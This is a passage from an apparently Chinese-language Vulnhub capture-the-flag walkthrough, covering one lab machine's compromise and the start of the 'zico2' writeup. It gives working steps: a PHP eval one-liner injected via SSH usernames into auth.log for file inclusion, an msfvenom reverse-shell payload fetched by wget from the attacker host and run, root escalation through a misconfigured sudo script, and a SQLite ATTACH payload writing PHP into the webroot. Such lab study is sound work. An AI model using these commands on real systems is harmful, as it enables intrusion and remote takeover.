<code>nmap -A -v 192.168.1.101 -oN nmap.txt</code></p><p>解释一下相关参数:</p><ul><li><code>-A</code> 详细扫描目标IP,加载所有脚本,尽可能全面的探测信息;</li><li><code>-v</code> 显示详细的扫描过程;</li><li><code>-oN</code> 将扫描结果以普通文本的格式输出到<code>nmap.txt</code>。
结果如下:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277637460813.jpg' alt='' referrerPolicy='no-referrer' /></li></ul><ul><li>威胁建模</li></ul><p>分析nmap的扫描结果,发现靶机只开放了<code>22</code>和<code>80</code>端口,系统为<code>Ubuntu</code>。<code>22</code>端口为<code>SSH</code>服务,<code>80</code>端口为<code>http</code>服务,Web容器为<code>Apache/2.4.18</code>。</p><p>通常Web会存在各种各样的问题,经过初步分析,以Web作为初步的渗透入口。</p><h2><a name='header-n8939' class='md-header-anchor '></a>Web漏洞挖掘</h2><h3><a name='header-n8940' class='md-header-anchor '></a>1. 使用niktoWeb漏洞扫描器</h3><p>使用nikto工具扫描Web漏洞,<code>nikto -h 192.168.1.101</code>,<code>-h</code>参数指定扫描目标。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277621096032.jpg' alt='' referrerPolicy='no-referrer' /></p><p>没有发现什么明显的高危漏洞,发现了<code>images</code>目录和<code>/icons/README</code>文件,没有什么利用价值。</p><h3><a name='header-n8946' class='md-header-anchor '></a>2. 使用dirb扫描网站目录</h3><p><code>dirb http://192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277623420335.jpg' alt='' referrerPolicy='no-referrer' /></p><p>除了部分静态文件,没有发现有价值的利用点。</p><h3><a name='header-n8953' class='md-header-anchor '></a>3. 浏览网站功能</h3><p>根据前两步基本的信息探测,并没有发现漏洞点。手动访问网站,分析网站功能。</p><p>点击<code>ABOUT US</code>链接后,发现URL为:<code>http://192.168.1.101/?file=about.php</code>,存在任意文件包含的可能。</p><h3><a name='header-n8958' class='md-header-anchor '></a>4. 文件包含漏洞测试</h3><p>为了直观的看到测试结果,这里使用Burpsuite处理http请求。</p><p>通过尝试包含Linux系统的配置文件,发现存在一定的限制。</p><p>如:包含<code>/etc/passwd</code>发现没有结果。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277629489901.jpg' alt='' referrerPolicy='no-referrer' /></p><p>之后测试了几个常见的Apache日志的路径:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/apache/access.log</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/apache2/access.log</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/www/logs/access.log</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/access.log</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 100px;"></div><div class="CodeMirror-gutters" style="display: none; height: 130px;"></div></div></div></pre><p>均无结果。</p><p>猜测可能是更改了配置文件的路径,尝试读Apache2的配置文件,<code>/etc/apache2/apache2.conf</code>,发现也是失败。</p><p>尝试通过php伪协议读取php文件源码,也无果。</p><p><code>file=php://filter/convert.base64-encode/resource=index.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277632154094.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根据之前整理的文件包含漏洞笔记利用思路:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277635091513.jpg' alt='' referrerPolicy='no-referrer' /></p><p>结合之前信息探测的结果,靶机只开通了<code>http</code>与<code>ssh</code>服务。Apache的日志包含失败,尝试包含ssh的登陆日志。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277638432449.jpg' alt='' referrerPolicy='no-referrer' /></p><p>成功读到ssh的登陆日志。</p><h2><a name='header-n8989' class='md-header-anchor '></a>获取shell</h2><h3><a name='header-n8990' class='md-header-anchor '></a>1. 获取一句话Webshell</h3><p>使用一句话作为用户名登陆靶机的ssh。</p><p><code>ssh '<?php eval($_GET['f']); ?>'@192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277640398321.jpg' alt='' referrerPolicy='no-referrer' /></p><p>SSH的日志会记录此次登陆行为,这样就可以把一句话写入ssh的日志文件。测试一下是否成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277643786689.jpg' alt='' referrerPolicy='no-referrer' /></p><p>可以看到一句话已经成功写入。</p><h3><a name='header-n9003' class='md-header-anchor '></a>2. msfvenom生成Meterpreter shell</h3><p>平时使用Msf比较多,这里也以Msf作为接下来主要的渗透工具。</p><p>首先生成Linux平台的shell程序。</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f elf > shell.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277683325190.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9012' class='md-header-anchor '></a>3. Metasploit 设置监听</h3><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">use exploit/multi/handler</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">set payload linux/x86/meterpreter/reverse_tcp</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">set lhost 192.168.1.102</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">exploit</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 100px;"></div><div class="CodeMirror-gutters" style="display: none; height: 130px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699437724.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9016' class='md-header-anchor '></a>4. 种植Meterpreter shell</h3><p>首先使用Python搭建一个简单的Web Server:<code>python -m SimpleHTTPServer 80</code></p><p>之后利用前面获得的一句话,执行命令,下载生成的木马,并且运行。</p><p>分别发送以下请求:</p><ol start='' ><li><code>/?file=/var/log/auth.log&f=system('wget+192.168.1.102/shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&f=system('chmod+%2bx+shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&f=system('./shell.elf')%3b</code></li></ol><p>注意:</p><ol start='' ><li>因为要执行的命令里面有空格、加号等符号,要将payload进行urlencode之后才可以正常执行。</li><li>因为生成的木马文件没有执行权限,下载到靶机后也无法执行,所以需要先给<code>shell.elf</code>添加执行权限,之后再执行。</li></ol><p>执行结果:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699964066.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Web Server及msf的结果:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277706402332.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9052' class='md-header-anchor '></a>提升权限</h2><p>Linux提权的基本思路:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9057' class='md-header-anchor '></a>1. 溢出提权</h3><p>现在拿到了目标靶机的Meterpreter shell,简单的看下信息。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277711519803.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现系统为<code>Ubuntu 16.04 (Linux 4.10.0-40-generic)</code>,前段时间爆了Ubuntu16.04提权的exp,在这里试一试。</p><p>exp 地址:<a href='https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' target='_blank' class='url'>https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c</a></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277744279712.jpg' alt='' referrerPolicy='no-referrer' /></p><p>提权失败。</p><h3><a name='header-n9070' class='md-header-anchor '></a>2. 使用msf提权</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>没有发现可以利用的提权漏洞。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277748088090.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h3><a name='header-n9079' class='md-header-anchor '></a>3. 错误的SUID文件提权</h3><p>进入交互式shell,派生一个bash的shell:
<code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>在Web的目录中发现了<code>xxxlogauditorxxx.py</code>,这是不应该存在的,猜测是题目所指的特殊文件,而且该文件特别大。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277741330578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>运行一下该py文件,发现是审计日志的程序。
查看Apache2的日志文件,发现是执行了<code>cat</code>命令,但是因为权限不够,没有执行成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277716185341.jpg' alt='' referrerPolicy='no-referrer' /></p><p>仔细查看py文件的权限,发现具有SUID的权限,且文件所属用户为root。</p><p><code>sudo --list</code>查看一下用户权限。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277721141332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现可以不使用密码即可以root权限运行该py文件。这就好办多了。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277722533145.jpg' alt='' referrerPolicy='no-referrer' /></p><p>该py文件的配置错误,导致可以直接以root权限执行命令。</p><p>接下来拿root权限的shell。</p><h3><a name='header-n9106' class='md-header-anchor '></a>4. 获取root权限的shell</h3><p>因为之前已经上传了Msfvenom生成的马,这里再次使用。首先退出<code>shell</code>,<code>background</code>命令调入后台,然后再次开启监听,并且置于后台。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277724353655.jpg' alt='' referrerPolicy='no-referrer' /></p><p>利用发现的特殊文件以root权限运行msf木马。</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">sudo ./xxxlogauditorxxx.py</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/apache2/access.log|./shell.elf</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277726121084.jpg' alt='' referrerPolicy='no-referrer' /></p><p>运行py之后,显示出现问题,不过不影响运行木马。</p><p>进入session 2的shell,查看权限:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277727104925.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9122' class='md-header-anchor '></a>获取flag</h2><p>在root的家目录发现了<code>flag.png</code>文件:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729121417.jpg' alt='' referrerPolicy='no-referrer' /></p><p>下载到本地进行分析:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729313511.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729611404.jpg' alt='' referrerPolicy='no-referrer' /></p><p>推测接下来的考点属于图片隐写。</p><p>经过分析,在图片文件的末尾发现了一串base64</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277730366648.jpg' alt='' referrerPolicy='no-referrer' /></p><p>将base64写入<code>flag.txt</code>,进行解码后get flag:</p><p><code>cat flag | base64 -d</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277731880443.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9145' class='md-header-anchor '></a>靶场思路回顾</h2><p>至此,已经完成最终目标,回头分析一下之前几个失败的点。</p><h3><a name='header-n9148' class='md-header-anchor '></a>1. Web方面利用失败原因</h3><p>首先看一下index.php的核心代码:</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><?php</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = $_GET["file"];</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("etc","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("php:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("expect:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("data:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("proc","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("home","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("opt","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">if ($file == "/var/log/auth.log") {</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">header("location: index.php");</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">}</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">else{</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">include($file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">}</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">include($file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">?></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 468px;"></div><div class="CodeMirror-gutters" style="display: none; height: 498px;"></div></div></div></pre><p>可以看到<code>index.php</code>将一些关键词置空了。</p><p>所以,之前利用不成功的点原因如下:</p><ul><li>伪协议读文件失败</li></ul><p>过滤了<code>php:</code>且大小写敏感,故不能使用伪协议读文件。</p><ul><li>读取配置文件、passwd文件等失败</li></ul><p>过滤了<code>etc</code>,无法读取任何配置文件</p><ul><li>读取Apache访问日志失败。</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277739100061.jpg' alt='' referrerPolicy='no-referrer' /></p><p>因权限问题,<code>www-data</code>用户无法写入和读取Apache的日志文件。故,包含Apache日志失败。</p><h3><a name='header-n9176' class='md-header-anchor '></a>2. 系统方面利用失败原因</h3><ul><li>溢出提权失败</li></ul><p>通过分析报错,原因可能是因为靶机系统为32位,但exp只支持64位系统。</p><h2><a name='header-n9183' class='md-header-anchor '></a>思路总结</h2><p>突破点总结:</p><ol start='' ><li>PHP本地文件包含漏洞发现</li><li>SSH日志写入一句话</li><li>利用LFI和SSH日志getshell</li><li>MSF生成木马,利用一句话植入、运行</li><li>利用错误配置SUID程序提权</li></ol><p>在完成这次靶场的过程中,可以有很多发散的思路,比如:</p><ol start='' ><li>文件包含漏洞,可以使用字典Fuzz一下各种配置文件。</li><li>使用NC或者其他反弹shell的姿势反弹shell。</li></ol><p>此外,Metasploit Framework有很多方便实用的功能,如果能够掌握,会大大简化渗透的某些步骤,值得深入学习。</p><p>总体来说,此靶场设计比较简单。一个Web,一个SSH,利用点无非这两个,思路比较清晰,便于实践者完成该靶场。</p><h1><a name='header-n9215' class='md-header-anchor '></a>第九节 zico2</h1><h2><a name='header-n9217' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n9218' class='md-header-anchor '></a>下载链接</h3><p> <a href='https://download.vulnhub.com/zico/zico2.ova' target='_blank' class='url'>https://download.vulnhub.com/zico/zico2.ova</a></p><h3><a name='header-n9221' class='md-header-anchor '></a>运行环境</h3><ul><li>​本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运行。</li><li>靶机:修改靶机的网络配置为桥接模式。</li><li>攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。</li></ul><h3><a name='header-n9232' class='md-header-anchor '></a>靶机说明</h3><p>本靶机的难度为中等。</p><p>本靶机的渗透目标为渗透进靶机,拿到root权限,并读取flag文件。</p><p>官方提供了一个提示:枚举、枚举、枚举。</p><h2><a name='header-n9239' class='md-header-anchor '></a>信息收集</h2><ul><li><p>ip发现</p><p>首先看一下Kali的网络配置。
  <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852282391.jpg' alt='' referrerPolicy='no-referrer' /></p><p>之后使用nmap发现靶机。<code>nmap -sP 192.168.1.0/24</code>发现有本网段有四个相关IP。</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852529644.jpg' alt='' referrerPolicy='no-referrer' /></p></li><li><p>端口扫描与服务识别</p><p>使用nmap快速扫描选项(<code>-F</code>参数)扫描<code>192.168.1.0/24</code>网段</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307853380399.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根据<code>Mac</code>可以很明显的区分,<code>192.168.1.3</code>为运行在VirtualBox上的虚拟机,即我们构建的靶机。</p><p>确定目标IP之后,使用Nmap对目标进行更加详细的探测:
<code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>解释一下相关参数:</p><ul><li><code>-A</code> 详细扫描目标IP,加载所有脚本,尽可能全面的探测信息;</li><li><code>-v</code> 显示详细的扫描过程;</li><li><code>-oN</code> 将扫描结果以普通文本的格式输出到<code>nmap.txt</code>。
结果如下:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307855078046.jpg' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>威胁建模</p><p>分析nmap的扫描结果,发现靶机开放了<code>22</code>和<code>80</code>,<code>111</code>端口,系统为<code>Linux</code>。<code>22</code>端口为<code>SSH</code>服务,<code>80</code>端口为<code>http</code>服务,Web容器为<code>Apache/2.2.22</code>。</p><p>通常Web会存在各种各样的问题,经过初步分析,以Web作为初步的渗透入口。</p></li></ul><h2><a name='header-n9286' class='md-header-anchor '></a>Web漏洞挖掘</h2><h3><a name='header-n9287' class='md-header-anchor '></a>1. 使用dirb扫描网站目录</h3><p><code>dirb http://192.168.1.3</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307858659578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现敏感目录<code>dbadmin</code></p><h3><a name='header-n9294' class='md-header-anchor '></a>2. 目录遍历漏洞</h3><p>访问<code>http://192.168.1.3/dbadmin/</code>,发现目录遍历了,同时存在<code>test_db.php</code>文件。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307859615079.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9299' class='md-header-anchor '></a>3. 弱口令</h3><p>访问<code>http://192.168.1.3/dbadmin/test_db.php</code>,发现是类似于MySQL的phpmyadmin,靶机的这个是sqlite的网页版管理。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307860283151.jpg' alt='' referrerPolicy='no-referrer' /></p><p>尝试弱口令<code>admin</code>即可进入。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307865109650.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9308' class='md-header-anchor '></a>4. phpLiteAdmin的信息收集</h3><p>查看原有的数据库,发现里面存在两个账号,使用somd5.com 解密。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307883468354.jpg' alt='' referrerPolicy='no-referrer' /></p><p>得到以下信息:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root 34kroot34</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">zico zico2215@</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><h3><a name='header-n9316' class='md-header-anchor '></a>5. 文件包含漏洞</h3><p>浏览网站功能,发现一个连接为:<a href='http://192.168.1.3/view.php?page=tools.html' target='_blank' class='url'>http://192.168.1.3/view.php?page=tools.html</a></p><p>猜测存在文件包含漏洞。经过尝试,可以成功包含Linux的passwd文件。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307882619884.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9323' class='md-header-anchor '></a>获取Webshell</h2><h3><a name='header-n9324' class='md-header-anchor '></a>1. 尝试通过新建数据库getshell</h3><p>Sqlite数据库一般应用在很多嵌入式设备当中,属于单文件的数据库,类似于Access数据库。这里尝试新建一个名为<code>shell.php</code>的数据库文件,对应的会生成shell.php的一个文件。但是观察到数据库文件的路径在<code>/usr/databases/test_users</code></p><p>那么,尝试新建一个数据库名为<code>../../var/www/html/shell.php</code>。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307866554332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>新建成功,但是发现过滤掉了<code>/</code>。此方法失败,但留作记录,算是一个突破点。</p><p> </p><h3><a name='header-n9335' class='md-header-anchor '></a>2. 尝试导出文件getshell</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307867627327.jpg' alt='' referrerPolicy='no-referrer' /></p><p>payload:<code>ATTACH DATABASE '/var/www/html/shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();?>');</code></p><p>通过这种方式写文件,适用于以下场景:</p><ol start='' ><li>可直接访问数据库执行SQL语句。</li><li>堆叠查询选项启用(默认关闭)</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307875215505.jpg' alt='' referrerPolicy='no-referrer' /></p><p>执行失败,放弃这个点。</p><h3><a name='header-n9353' class='md-header-anchor '></a>3. 利用phpliteadmin和文件包含漏洞getshell</h3><p>经过前期的尝试,发现了文件包含漏洞和数据库权限。两者结合,即可getshell。方法如下:</p><ol start='' ><li>通过phpliteadmin新加一条数据,写入数据库文件。</li><li>利用文件包含漏洞包含数据库文件getshell。</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307890668345.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307891213556.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><p> </p><h3><a name='header-n9371' class='md-header-anchor 